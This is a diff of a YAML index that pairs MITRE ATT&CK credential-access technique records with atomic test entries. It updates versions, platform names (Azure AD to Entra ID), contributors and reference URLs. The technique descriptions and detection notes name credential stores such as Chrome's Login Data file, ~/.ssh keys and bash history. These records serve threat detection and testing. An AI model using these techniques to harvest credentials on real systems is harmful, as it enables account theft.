         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -50304,55 +51075,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -50382,6 +51108,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -50391,18 +51123,53 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests:
     - name: Search macOS Safari Cookies
@@ -50442,7 +51209,7 @@ credential-access:
         name: sh
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -50479,23 +51246,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -50528,21 +51295,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -50553,7 +51319,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -50587,7 +51353,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -50615,7 +51381,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -50626,9 +51392,8 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests:
     - name: Discover Private SSH Keys
@@ -50712,7 +51477,7 @@ credential-access:
         name: sh
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -50820,12 +51585,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -50862,6 +51626,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -50874,7 +51639,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -50924,12 +51689,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests: []
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -50955,6 +51719,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -50970,18 +51735,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -51008,14 +51773,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -51026,13 +51788,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -51046,6 +51808,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -51056,12 +51819,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -51136,7 +51899,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests: []
   T1558.001:
@@ -51182,7 +51944,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -51217,16 +51979,14 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests: []
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -51236,21 +51996,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -51299,33 +52061,11 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests: []
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -51340,20 +52080,38 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests:
     - name: Search Through Bash History
@@ -51387,7 +52145,7 @@ credential-access:
         name: sh
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -51461,7 +52219,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests:
     - name: Find AWS credentials
@@ -51592,11 +52349,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -51645,6 +52401,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -51653,6 +52410,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -51663,13 +52421,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -51725,44 +52484,11 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests: []
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -51779,25 +52505,54 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
